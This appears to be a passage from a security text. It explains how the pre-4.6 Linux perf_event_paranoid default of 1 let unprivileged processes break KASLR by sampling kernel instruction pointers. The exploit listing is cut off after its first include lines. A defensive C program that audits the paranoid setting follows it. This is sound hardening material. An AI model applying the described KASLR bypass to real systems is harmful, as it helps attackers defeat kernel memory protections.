Before Linux 4.6, the default value of /proc/sys/kernel/perf_event_paranoid was 1, so any Linux process could sample kernel addresses with perf_event_open's PERF_SAMPLE_IP. KASLR can therefore be broken by sampling kernel instruction-pointer addresses and taking the minimum.

Listing 59: perf_rip_find.c

/* -*- compile-command: "gcc -Wall perf_rip_find.c -o perf_rip_find" -*- */
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall...
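As an added hardening check, not part of the original listing, the program below reads the kernel.perf_event_paranoid level the text refers to and reports whether an unprivileged process may still sample kernel instruction pointers; the path macro, function names and verdict strings are assumptions of this example.

```c
/* Audit helper (added example): classify kernel.perf_event_paranoid. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PERF_PARANOID_PATH "/proc/sys/kernel/perf_event_paranoid"

/* Level semantics (Documentation/admin-guide/sysctl/kernel.rst):
 *  -1  no restrictions
 *   0  raw tracepoint access denied to unprivileged users
 *   1  CPU/system-wide events denied to unprivileged users
 *   2  kernel profiling denied to unprivileged users (default since 4.6)
 *  >=3 all unprivileged perf_event_open denied (some distribution kernels)
 * Processes holding CAP_SYS_ADMIN bypass the check at every level. */

/* 1 when an unprivileged process may sample kernel IPs (exclude_kernel=0). */
int perf_kernel_sampling_unprivileged(long level) { return level <= 1; }

/* Parse the sysctl file at `path`; 0 on success, -1 on error. */
int read_paranoid_level(const char *path, long *level) {
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    char buf[32];
    if (!fgets(buf, sizeof buf, f)) { fclose(f); return -1; }
    fclose(f);
    char *end;
    long v = strtol(buf, &end, 10);
    if (end == buf) return -1;      /* no digits: treat as unreadable */
    *level = v;
    return 0;
}

/* Verdict string; the fix is `sysctl -w kernel.perf_event_paranoid=2`. */
const char *perf_paranoid_verdict(long level) {
    if (level <= 1) return "WEAK: unprivileged kernel IP sampling allowed";
    if (level == 2) return "OK: kernel profiling restricted to privileged users";
    return "OK: all unprivileged perf_event_open denied";
}

int main(void) {
    long level;
    if (read_paranoid_level(PERF_PARANOID_PATH, &level) != 0) {
        perror(PERF_PARANOID_PATH);
        return 2;
    }
    printf("kernel.perf_event_paranoid = %ld: %s\n", level,
           perf_paranoid_verdict(level));
    return perf_kernel_sampling_unprivileged(level) ? 1 : 0;  /* 1 = weak */
}
```

Exit status 1 flags a level of 1 or lower, which is the configuration the listing relies on; a level of 2 only restricts unprivileged users, so processes with CAP_SYS_ADMIN can still sample kernel addresses.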